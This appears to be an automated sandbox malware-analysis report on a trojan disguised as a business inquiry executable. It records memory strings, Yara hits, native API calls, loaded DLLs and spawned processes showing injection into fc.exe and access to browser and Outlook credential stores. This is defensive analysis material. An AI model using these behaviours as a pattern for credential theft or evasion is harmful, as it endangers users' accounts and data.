              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:46 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Content-Length: 148
              Content-Type: text/html
              Date: Mon, 13 Jan 2025 14:12:48 GMT
              Etag: "6743f11f-94"
              Server: nginx
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Content-Length: 148
              Content-Type: text/html
              Date: Mon, 13 Jan 2025 14:12:51 GMT
              Etag: "6743f11f-94"
              Server: nginx
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 13 Jan 2025 14:12:57 GMT
              Server: Apache
              Content-Length: 774
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 13 Jan 2025 14:12:59 GMT
              Server: Apache
              Content-Length: 774
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 13 Jan 2025 14:13:02 GMT
              Server: Apache
              Content-Length: 774
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 13 Jan 2025 14:13:04 GMT
              Server: Apache
              Content-Length: 774
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Sun, 12 Jan 2025 22:12:35 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Sun, 12 Jan 2025 22:12:38 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Sun, 12 Jan 2025 22:12:41 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 0000000A.00000002.2508765687.000000000472C000.00000004.10000000.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2508378141.0000000003CAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 0000000A.00000003.1852296960.0000000007FAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

              E-Banking Fraud

              Source: Yara match File source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8CB43 NtClose,0_2_00E8CB43
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542B60 NtClose,LdrInitializeThunk,0_2_01542B60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01542DF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01542C70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015435C0 NtCreateMutant,LdrInitializeThunk,0_2_015435C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01544340 NtSetContextThread,0_2_01544340
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01544650 NtSuspendThread,0_2_01544650
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BF0 NtAllocateVirtualMemory,0_2_01542BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BE0 NtQueryValueKey,0_2_01542BE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542B80 NtQueryInformationFile,0_2_01542B80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BA0 NtEnumerateValueKey,0_2_01542BA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AD0 NtReadFile,0_2_01542AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AF0 NtWriteFile,0_2_01542AF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AB0 NtWaitForSingleObject,0_2_01542AB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D10 NtMapViewOfSection,0_2_01542D10
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D00 NtSetInformationFile,0_2_01542D00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D30 NtUnmapViewOfSection,0_2_01542D30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DD0 NtDelayExecution,0_2_01542DD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DB0 NtEnumerateKey,0_2_01542DB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C60 NtCreateKey,0_2_01542C60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C00 NtQueryInformationProcess,0_2_01542C00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CC0 NtQueryVirtualMemory,0_2_01542CC0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CF0 NtOpenProcess,0_2_01542CF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CA0 NtQueryInformationToken,0_2_01542CA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F60 NtCreateProcessEx,0_2_01542F60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F30 NtCreateSection,0_2_01542F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FE0 NtCreateFile,0_2_01542FE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F90 NtProtectVirtualMemory,0_2_01542F90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FB0 NtResumeThread,0_2_01542FB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FA0 NtQuerySection,0_2_01542FA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542E30 NtWriteVirtualMemory,0_2_01542E30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542EE0 NtQueueApcThread,0_2_01542EE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542E80 NtReadVirtualMemory,0_2_01542E80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542EA0 NtAdjustPrivilegesToken,0_2_01542EA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543010 NtOpenDirectoryObject,0_2_01543010
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543090 NtSetValueKey,0_2_01543090
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015439B0 NtGetContextThread,0_2_015439B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543D70 NtOpenThread,0_2_01543D70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543D10 NtOpenProcessToken,0_2_01543D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03744340 NtSetContextThread,LdrInitializeThunk,10_2_03744340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03744650 NtSuspendThread,LdrInitializeThunk,10_2_03744650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742B60 NtClose,LdrInitializeThunk,10_2_03742B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03742BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03742BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03742BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AF0 NtWriteFile,LdrInitializeThunk,10_2_03742AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AD0 NtReadFile,LdrInitializeThunk,10_2_03742AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F30 NtCreateSection,LdrInitializeThunk,10_2_03742F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FE0 NtCreateFile,LdrInitializeThunk,10_2_03742FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FB0 NtResumeThread,LdrInitializeThunk,10_2_03742FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03742EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03742E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03742D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03742D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03742DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DD0 NtDelayExecution,LdrInitializeThunk,10_2_03742DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03742C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C60 NtCreateKey,LdrInitializeThunk,10_2_03742C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03742CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037435C0 NtCreateMutant,LdrInitializeThunk,10_2_037435C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037439B0 NtGetContextThread,LdrInitializeThunk,10_2_037439B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742B80 NtQueryInformationFile,10_2_03742B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AB0 NtWaitForSingleObject,10_2_03742AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F60 NtCreateProcessEx,10_2_03742F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FA0 NtQuerySection,10_2_03742FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F90 NtProtectVirtualMemory,10_2_03742F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742E30 NtWriteVirtualMemory,10_2_03742E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742EA0 NtAdjustPrivilegesToken,10_2_03742EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D00 NtSetInformationFile,10_2_03742D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DB0 NtEnumerateKey,10_2_03742DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C00 NtQueryInformationProcess,10_2_03742C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CF0 NtOpenProcess,10_2_03742CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CC0 NtQueryVirtualMemory,10_2_03742CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743010 NtOpenDirectoryObject,10_2_03743010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743090 NtSetValueKey,10_2_03743090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743D70 NtOpenThread,10_2_03743D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743D10 NtOpenProcessToken,10_2_03743D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC93B0 NtCreateFile,10_2_02EC93B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC96B0 NtClose,10_2_02EC96B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9610 NtDeleteFile,10_2_02EC9610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9520 NtReadFile,10_2_02EC9520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9820 NtAllocateVirtualMemory,10_2_02EC9820
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 03757E54 appears 102 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 0377EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 0378F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 036FB970 appears 275 times
              Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 03745130 appears 58 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe Code function: String function: 0157EA12 appears 86 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe Code function: String function: 01557E54 appears 111 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe Code function: String function: 0158F290 appears 105 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe Code function: String function: 014FB970 appears 277 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe Code function: String function: 01545130 appears 58 times
              Source: CSZ inquiry for MH raw material.exe Static PE information: No import functions for PE file found
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000144C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.0000000001238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000017A1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@6/6
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user~1\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: CSZ inquiry for MH raw material.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 0000000A.00000002.2505857523.000000000331F000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2505857523.0000000003351000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2505857523.0000000003340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: CSZ inquiry for MH raw material.exeReversingLabs: Detection: 73%
              Source: CSZ inquiry for MH raw material.exeVirustotal: Detection: 66%
              Source: unknownProcess created: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: CSZ inquiry for MH raw material.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mSWyWMUGFWJCYT.exe, 00000009.00000000.1586785927.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000000.1731726848.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp
